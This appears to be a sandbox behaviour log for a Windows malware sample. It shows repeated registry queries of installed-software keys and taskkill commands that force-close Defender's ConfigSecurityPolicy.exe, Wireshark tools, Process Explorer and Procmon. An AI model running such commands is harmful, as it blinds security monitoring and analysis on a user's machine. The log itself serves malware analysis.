C:\Windows\system32\cmd.execmd.exe2⤵PID:1808
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90140000-006E-0409-1000-0000000FF1CE}" /reg:643⤵PID:1664
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90140000-006E-0409-1000-0000000FF1CE}" /reg:323⤵PID:2032
-
-
-
C:\Windows\system32\cmd.execmd.exe2⤵PID:1852
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90140000-00A1-0409-1000-0000000FF1CE}" /reg:643⤵PID:1540
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90140000-00A1-0409-1000-0000000FF1CE}" /reg:323⤵PID:1332
-
-
-
C:\Windows\system32\cmd.execmd.exe2⤵PID:464
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90140000-00BA-0409-1000-0000000FF1CE}" /reg:643⤵PID:1924
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90140000-00BA-0409-1000-0000000FF1CE}" /reg:323⤵PID:1500
-
-
-
C:\Windows\system32\cmd.execmd.exe2⤵PID:1692
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90140000-0115-0409-1000-0000000FF1CE}" /reg:643⤵PID:456
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90140000-0115-0409-1000-0000000FF1CE}" /reg:323⤵PID:792
-
-
-
C:\Windows\system32\cmd.execmd.exe2⤵PID:1868
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90140000-0117-0409-1000-0000000FF1CE}" /reg:643⤵PID:1632
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90140000-0117-0409-1000-0000000FF1CE}" /reg:323⤵PID:1060
-
-
-
C:\Windows\system32\cmd.execmd.exe2⤵PID:2012
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{92FB6C44-E685-45AD-9B20-CADF4CABA132} - 1033" /reg:643⤵PID:1516
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{92FB6C44-E685-45AD-9B20-CADF4CABA132} - 1033" /reg:323⤵PID:1940
-
-
-
C:\Windows\System32\taskkill.exe"C:\Windows\System32\taskkill.exe" /IM "ConfigSecurityPolicy.exe" /T /F2⤵
- Kills process with taskkill
PID:1532
-
-
C:\Windows\system32\cmd.execmd.exe2⤵PID:1564
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{CB0836EC-B072-368D-82B2-D3470BF95707}" /reg:643⤵PID:1604
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{CB0836EC-B072-368D-82B2-D3470BF95707}" /reg:323⤵PID:456
-
-
-
C:\Windows\system32\cmd.execmd.exe2⤵PID:1932
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{CF2BEA3C-26EA-32F8-AA9B-331F7E34BA97}" /reg:643⤵PID:1632
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{CF2BEA3C-26EA-32F8-AA9B-331F7E34BA97}" /reg:323⤵PID:784
-
-
-
C:\Windows\system32\cmd.execmd.exe2⤵PID:480
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{F7CAC7DF-3524-4C2D-A7DB-E16140A3D5E6}" /reg:643⤵PID:1516
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{F7CAC7DF-3524-4C2D-A7DB-E16140A3D5E6}" /reg:323⤵PID:1872
-
-
-
C:\Windows\system32\cmd.execmd.exe2⤵PID:792
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\Adobe AIR" /reg:643⤵PID:1176
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\Adobe AIR" /reg:323⤵PID:1620
-
-
-
C:\Windows\system32\cmd.execmd.exe2⤵PID:2032
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\Google Chrome" /reg:643⤵PID:1012
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\Google Chrome" /reg:323⤵PID:1060
-
-
-
C:\Windows\system32\cmd.execmd.exe2⤵PID:1632
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{00203668-8170-44A0-BE44-B632FA4D780F}" /reg:643⤵PID:1056
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{00203668-8170-44A0-BE44-B632FA4D780F}" /reg:323⤵PID:2004
-
-
-
C:\Windows\system32\cmd.execmd.exe2⤵PID:1872
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB2151757" /reg:643⤵PID:1332
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB2151757" /reg:323⤵PID:1928
-
-
-
C:\Windows\system32\cmd.execmd.exe2⤵PID:1052
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB2467173" /reg:643⤵PID:1012
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB2467173" /reg:323⤵PID:784
-
-
-
C:\Windows\system32\cmd.execmd.exe2⤵PID:1924
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB2524860" /reg:643⤵PID:2004
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB2524860" /reg:323⤵PID:1508
-
-
-
C:\Windows\System32\taskkill.exe"C:\Windows\System32\taskkill.exe" /IM "procexp.exe" /T /F2⤵
- Kills process with taskkill
PID:1500
-
-
C:\Windows\system32\cmd.execmd.exe2⤵PID:1540
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB2544655" /reg:643⤵PID:1472
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB2544655" /reg:323⤵PID:1508
-
-
-
C:\Windows\system32\cmd.execmd.exe2⤵PID:2004
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB2549743" /reg:643⤵PID:1060
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB2549743" /reg:323⤵PID:1512
-
-
-
C:\Windows\system32\cmd.execmd.exe2⤵PID:1332
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB2565063" /reg:643⤵PID:1500
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB2565063" /reg:323⤵PID:1508
-
-
-
C:\Windows\system32\cmd.execmd.exe2⤵PID:1060
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB982573" /reg:643⤵PID:1604
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB982573" /reg:323⤵PID:1940
-
-
-
C:\Windows\system32\cmd.execmd.exe2⤵PID:1508
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{92FB6C44-E685-45AD-9B20-CADF4CABA132}.KB4087364" /reg:643⤵PID:1620
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{92FB6C44-E685-45AD-9B20-CADF4CABA132}.KB4087364" /reg:323⤵PID:1500
-
-
-
C:\Windows\system32\cmd.execmd.exe2⤵PID:1604
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{AC76BA86-7AD7-1033-7B44-A90000000001}" /reg:643⤵PID:1620
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{AC76BA86-7AD7-1033-7B44-A90000000001}" /reg:323⤵PID:1012
-
-
-
C:\Windows\system32\cmd.execmd.exe2⤵PID:1940
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{BB8B979E-E336-47E7-96BC-1031C1B94561}" /reg:643⤵PID:1012
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{BB8B979E-E336-47E7-96BC-1031C1B94561}" /reg:323⤵PID:2056
-
-
-
C:\Windows\system32\cmd.execmd.exe2⤵PID:2068
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{ca67548a-5ebe-413a-b50c-4b9ceb6d66c6}" /reg:643⤵PID:2080
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{ca67548a-5ebe-413a-b50c-4b9ceb6d66c6}" /reg:323⤵PID:2092
-
-
-
C:\Windows\system32\cmd.execmd.exe2⤵PID:2104
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{ef6b00ec-13e1-4c25-9064-b2f383cb8412}" /reg:643⤵PID:2116
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{ef6b00ec-13e1-4c25-9064-b2f383cb8412}" /reg:323⤵PID:2128
-
-
-
C:\Windows\system32\cmd.execmd.exe2⤵PID:2140
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{f4220b74-9edd-4ded-bc8b-0342c1e164d8}" /reg:643⤵PID:2152
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{f4220b74-9edd-4ded-bc8b-0342c1e164d8}" /reg:323⤵PID:2164
-
-
-
C:\Windows\System32\taskkill.exe"C:\Windows\System32\taskkill.exe" /IM "wireshark.exe" /T /F2⤵
- Kills process with taskkill
PID:2176
-
-
C:\Windows\System32\taskkill.exe"C:\Windows\System32\taskkill.exe" /IM "tshark.exe" /T /F2⤵
- Kills process with taskkill
PID:2224
-
-
C:\Windows\System32\taskkill.exe"C:\Windows\System32\taskkill.exe" /IM "text2pcap.exe" /T /F2⤵
- Kills process with taskkill
PID:2280
-
-
C:\Windows\System32\taskkill.exe"C:\Windows\System32\taskkill.exe" /IM "rawshark.exe" /T /F2⤵
- Kills process with taskkill
PID:2328
-
-
C:\Windows\System32\taskkill.exe"C:\Windows\System32\taskkill.exe" /IM "dumpcap.exe" /T /F2⤵
- Kills process with taskkill
PID:2376
-
-
C:\Windows\System32\taskkill.exe"C:\Windows\System32\taskkill.exe" /IM "capinfos.exe" /T /F2⤵
- Kills process with taskkill
PID:2424
-
-
C:\Windows\System32\taskkill.exe"C:\Windows\System32\taskkill.exe" /IM "Procmon.exe" /T /F2⤵
- Kills process with taskkill
PID:2472
-